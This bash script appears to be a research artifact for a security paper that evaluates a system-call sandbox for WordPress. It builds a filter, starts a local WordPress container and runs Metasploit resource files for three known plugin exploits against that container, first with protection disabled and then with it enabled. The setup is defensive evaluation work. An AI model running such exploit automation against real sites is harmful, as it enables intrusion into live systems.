#!/bin/bash
RED='\033[0;31m' # Red
GR='\033[0;32m'  # Green
NC='\033[0m'     # No Color


## STEP 1
ARTIFACT_ROOT=$PWD

## build the docker
cd 1_static_analysis && docker build -t sec21_paper_258_1_static_analysis . && cd ..

## run the docker for the static analysis
docker run --name ws_sa -d --rm -it -v ${ARTIFACT_ROOT}/2_live_test/data/wordpress/html/:/www/ -v ${ARTIFACT_ROOT}/1_static_analysis/share:/share/ sec21_paper_258_1_static_analysis

## build the project
docker exec -it ws_sa  make

## run the static analysis
docker exec -it ws_sa ./profile_application.sh /www/ /share/filter

## stop the docker container for the static analysis
docker stop ws_sa

## STEP 2

cd $ARTIFACT_ROOT/2_live_test/

## copy the system-call filter 
cp $ARTIFACT_ROOT/1_static_analysis/share/filter ./data/wordpress/filter

## build the docker for the live test
docker build --build-arg SITE_DIR=./data/wordpress/ -t sec21_paper_258_2_live_test_wordpress .

## run the live test docker container
docker run --name ws_live -d  --security-opt apparmor=unconfined -e DISABLE_PROTECTION=1 --rm -it  sec21_paper_258_2_live_test_wordpress

## get the ip of running docker container
IP=$(docker inspect ws_live --format '{{ .NetworkSettings.IPAddress }}')

## cd to ARTIFACT_ROOT
cd ..

## create exploits
mkdir $ARTIFACT_ROOT/exploit
echo -e "use exploit/unix/webapp/wp_foxypress_upload \n\nset rhosts $IP \nexploit \nexit" > $ARTIFACT_ROOT/exploit/foxy_exploit.rc
echo -e "use exploit/unix/webapp/wp_wysija_newsletters_upload  \n\nset rhosts $IP \nexploit \nexit" > $ARTIFACT_ROOT/exploit/wysjia_exploit.rc
echo -e "use exploit/unix/webapp/wp_symposium_shell  \n\nset rhosts $IP \nexploit \nexit" > $ARTIFACT_ROOT/exploit/symposium_exploit.rc

# run metasploit
docker run -d --name exploit --rm -v $ARTIFACT_ROOT/exploit:/usr/share/exploits -it metasploitframework/metasploit-framework

## exploit  the vulnerabilities
echo -e "${GR}the available configuration for each exploit is available in /usr/share/exploits"
echo "${NC}Example: ${GR}resource /usr/share/exploits/foxy_exploit.rc ${NC}"
docker exec -it exploit ./msfconsole -r /usr/share/exploits/foxy_exploit.rc
docker exec -it exploit ./msfconsole -r /usr/share/exploits/wysjia_exploit.rc
docker exec -it exploit ./msfconsole -r /usr/share/exploits/symposium_exploit.rc

## stop the dockers
docker stop ws_live
docker stop exploit
rm -r $ARTIFACT_ROOT/exploit

## TIME FOR OUR SYSTEMCALL SANDBOXING

## run the live test docker container with WS plugin enabled
docker run --name ws_live -d  --security-opt apparmor=unconfined --rm -it  sec21_paper_258_2_live_test_wordpress

## get the ip of running docker container
IP=$(docker inspect ws_live --format '{{ .NetworkSettings.IPAddress }}')

## create exploits
mkdir $ARTIFACT_ROOT/exploit
echo -e "use exploit/unix/webapp/wp_foxypress_upload \n\nset rhosts $IP \nexploit \nexit" > $ARTIFACT_ROOT/exploit/foxy_exploit.rc
echo -e "use exploit/unix/webapp/wp_wysija_newsletters_upload  \n\nset rhosts $IP \nexploit \nexit" > $ARTIFACT_ROOT/exploit/wysjia_exploit.rc
echo -e "use exploit/unix/webapp/wp_symposium_shell  \n\nset rhosts $IP \nexploit \nexit" > $ARTIFACT_ROOT/exploit/symposium_exploit.rc

# run metasploit
docker run -d --name exploit --rm -v $ARTIFACT_ROOT/exploit:/usr/share/exploits -it metasploitframework/metasploit-framework
## exploit the first vulnerability
echo "${RED}At this secure mode, the exploit should not open a session to vulnerable web app"
echo "${NC}the available configuration for each exploit is available in /usr/share/exploits"
echo "Example resource /usr/share/exploits/foxy_exploit.rc"
docker exec -it exploit ./msfconsole -r /usr/share/exploits/foxy_exploit.rc
docker exec -it exploit ./msfconsole -r /usr/share/exploits/wysjia_exploit.rc
docker exec -it exploit ./msfconsole -r /usr/share/exploits/symposium_exploit.rc

## stop the dockers
echo "Stopping MSF"
docker stop exploit
echo "A protected WordPress site is accessible at http://${IP}/"
read -p "Press enter to stop the site..."

## remove the exploits folder
rm -r $ARTIFACT_ROOT/exploit
